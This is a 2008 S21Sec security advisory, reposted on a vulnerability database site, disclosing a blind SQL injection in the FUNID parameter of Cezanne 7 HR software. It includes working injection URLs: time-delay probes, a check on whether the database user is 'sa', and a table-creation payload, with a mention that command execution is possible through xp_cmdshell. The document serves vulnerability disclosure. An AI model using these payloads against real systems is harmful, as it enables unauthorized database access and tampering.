Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19650
HistoryApr 15, 2008 - 12:00 a.m.

S21SEC-043-en:Cezanne SW Blind SQL Injection

2008-04-1500:00:00
vulners.com
77
JSON

##############################################################

  • S21Sec Advisory -

##############################################################

Title: Cezanne SW (login required) Blind SQL Injection
ID: S21SEC-043-en
Severity: High
History:
02.Jan.2008 Vulnerability discovered
Authors:
Juan de la Fuente Costa ([email protected])
Fco Javier Puerta Rubio ([email protected])
URL: http://www.s21sec.com/avisos/s21sec-43-en.txt

[ SUMMARY ]

Cezanne develops Human Capital Management Software.

This Software provides leading-edge Human Capital Management solutions
that help companies better develop, manage, reward and retain their most
important asset - their people.

Cezanne include applications for employee performance management, career &
succession planning, training & development, people management,
recruitment, salary analysis & compensation planning, pay review, employee
survey and organization charting.

[ AFFECTED VERSIONS ]

This vulnerability has been tested in Cezanne 7.

[ SCENARIO ]

The test has been done in the following environment:

MS Windows Server 2003 Enterprise Edition, IIS 6.0, MS SQL Server 2005

[ DESCRIPTION ]

S21sec has discovered a vulnerability in Cezanne 7 that allows injecting
SQL code in text variables.
This issue allows SQL code execution in the application server.
The vulnerable param is "FUNID"
Some examples of the exploitation:

URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/CFLookup.asp?FUNID=7302015;waitfor%20delay%20'0:0:20';--&InIFrame=1
STRING:;waitfor%20delay%20'0:0:20';–

URL[ NEEDS LOGIN ]:
https://www.somesite.es/cezanneweb/CznCommon/CznCustomContainer.asp?FUNID=7302031;waitfor%20delay%20'0:0:05';--
STRING:;waitfor%20delay%20'0:0:05';–

To get more information about the system or create tables:

If the following request, it takes a delay of ten seconds, the database
user is not 'sa':

https://www.somesite.es/cezanneweb/CznCommon/CznCustomContainer.asp?FUNID=7302031;if
(select user) <> 'sa' waitfor delay '0:0:10';–

In MS SQL Server 2005, xp_cmdshell is disable by default. But We can
create tables with the following request:

https://www.somesite.es/cezanneweb/CznCommon/CznCustomContainer.asp?FUNID=7302031;CREATE
TABLE tabla_test_blindSQL_intrusion (clave int IDENTITY (100,1) PRIMARY
KEY, nombre nvarchar (50));waitfor%20delay%20'0:0:10';–

If xp_cmdshell is enable, It is possible execute command line instructions.

[ WORKAROUND ]

Contact with Cezanne Software at: http://www.cezannesw.com/

[ ACKNOWLEDGMENTS ]

This vulnerability has been discovered and researched by:

  • Juan de la Fuente Costa S21Sec
  • Fco Javier Puerta Rubio S21Sec
    Special thanks to Vicente Diaz Saez.

You can find the last version of this warning at:
http://www.s21sec.com/es/avisos/s21sec-043-en.txt

http://www.s21sec.com
http://blog.s21sec.com

JSON